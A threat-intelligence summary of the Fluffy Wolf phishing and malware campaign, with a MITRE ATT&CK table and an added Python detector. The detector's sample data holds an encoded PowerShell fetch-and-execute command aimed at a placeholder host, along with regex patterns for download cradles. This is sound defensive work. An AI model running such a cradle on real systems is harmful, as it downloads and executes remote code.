EXECUTIVE SUMMARY
Fluffy Wolf, an organized cyber‐crime group active in early 2026, has been targeting Russian enterprises across construction, consulting, manufacturing, engineering, retail and e‐commerce. The campaign relies on phishing emails that masquerade as legitimate business correspondence, often referencing unpaid invoices or debt notices. Delivery mechanisms include malicious attachments and links to compromised public code repositories, allowing the actors to bypass standard email filters. The primary objectives are credential harvesting through the PureLogs stealer and extortion via the Pay2Key ransomware, with occasional deployment of the PureRAT remote‐access tool to maintain persistence and enable further data exfiltration.
The infection chain begins when a recipient opens a malicious attachment or clicks a link to a public code repository, which drops a compressed archive containing a PE file or script. That file launches a PowerLoader downloader that silently invokes PowerShell to fetch the PureCrypter loader. PureCrypter unpacks in memory, decrypts the payload and injects it into trusted processes such as RegAsm.exe or InstallUtil.exe. Once active, the payload deploys the PureLogs stealer, the PureRAT trojan, or the Pay2Key ransomware.
Command‐and‐control communication occurs over HTTP, with encrypted data streams masking exfiltration and encryption activities. The campaign poses a serious risk because it blends credential theft with ransomware, giving attackers multiple avenues for profit and persistence. The use of legitimate‐looking repository URLs and encrypted PowerShell commands hampers traditional signature‐based detection, while the in‐memory decryption of payloads reduces forensic visibility. Organizations should harden email gateways, enforce attachment sandboxing, and block unauthenticated downloads from public code repositories. Continuous monitoring for abnormal PowerShell activity, regular patching of underlying software, and maintaining offline, immutable backups will limit impact and accelerate recovery after an infection.
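As an added example (not code from the report or from BI.ZONE), the following Python applies three of the detection ideas above to constructed Sysmon-style process-creation records: PowerShell launched with an encoded download cradle, PowerShell spawned by a parent in a user-writable directory, and RegAsm.exe or InstallUtil.exe started without an assembly argument, which fits their described use as injection hosts. The event field names, rule names, sample paths and the placeholder URL are assumptions.

```python
import base64
import re

# Constructed Sysmon-style process-creation records (illustrative, not from the report).
SAMPLE_EVENTS = [
    {"pid": 4100, "parent": r"C:\Users\u\Downloads\Invoice_2026.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + base64.b64encode(
         "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/x')".encode("utf-16-le")).decode()},
    {"pid": 4112, "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"'},
    {"pid": 4120, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"pid": 4130, "parent": r"C:\Program Files\Vendor\setup.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "cmdline": r'InstallUtil.exe "C:\Program Files\Vendor\Service.exe"'},
]

USER_WRITABLE = re.compile(r"\\(Users\\[^\\]+\\(Downloads|AppData)|Windows\\Temp)\\", re.I)
CRADLE = re.compile(r"DownloadString|DownloadFile|WebClient|Invoke-WebRequest|\biwr\b|\bIEX\b|Invoke-Expression", re.I)
INJECTION_HOSTS = ("regasm.exe", "installutil.exe")  # .NET utilities the report names as injection targets

def decode_encoded_command(cmdline):
    # PowerShell -enc / -EncodedCommand carries a base64 UTF-16LE script; return it decoded, or None.
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(events):
    # Returns (pid, rule) pairs; one event can trigger several rules.
    findings = []
    for ev in events:
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        if image == "powershell.exe":
            script = decode_encoded_command(ev["cmdline"])
            if script and CRADLE.search(script):
                findings.append((ev["pid"], "encoded_download_cradle"))
            if USER_WRITABLE.search(ev["parent"]):
                findings.append((ev["pid"], "powershell_from_user_writable_parent"))
        elif image in INJECTION_HOSTS:
            # Legitimate use passes an assembly path; an empty argument list suggests a hollow host.
            rest = ev["cmdline"][ev["cmdline"].lower().find(image) + len(image):]
            if not re.search(r"\.(dll|exe)\b", rest, re.I):
                findings.append((ev["pid"], "dotnet_utility_without_assembly"))
    return findings
```

Running `analyze(SAMPLE_EVENTS)` flags the encoded cradle and its Downloads-folder parent for PID 4100 and the argument-less RegAsm.exe for PID 4112, while the scheduled script and the vendor installer pass.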
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
|---|---|---|---|
| Initial Access | T1566.001 | Phishing | Spearphishing Attachment |
| Initial Access | T1566.002 | Phishing | Spearphishing Link |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Execution | T1059.003 | Command and Scripting Interpreter | Windows Command Shell |
| Privilege Escalation | T1055.001 | Process Injection | Dynamic-link Library Injection |
| Defense Evasion | T1027.003 | Obfuscated Files or Information | Steganography |
| Credential Access | T1555.003 | Credentials from Password Stores | Credentials from Web Browsers |
| Credential Access | T1555.004 | Credentials from Password Stores | Windows Credential Manager |
| Credential Access | T1552.002 | Unsecured Credentials | Credentials in Registry |
| Discovery | T1082 | System Information Discovery | — |
| Lateral Movement | T1021.001 | Remote Services | Remote Desktop Protocol |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
REFERENCES:
The reports contain further technical details:
https://bi.zone/eng/expertise/blog/fluffy-wolf-ispytal-novinki-na-rossiyskikh-kompaniyakh/
https://securityonline.info/fluffy-wolf-phishing-attacks-powerloader/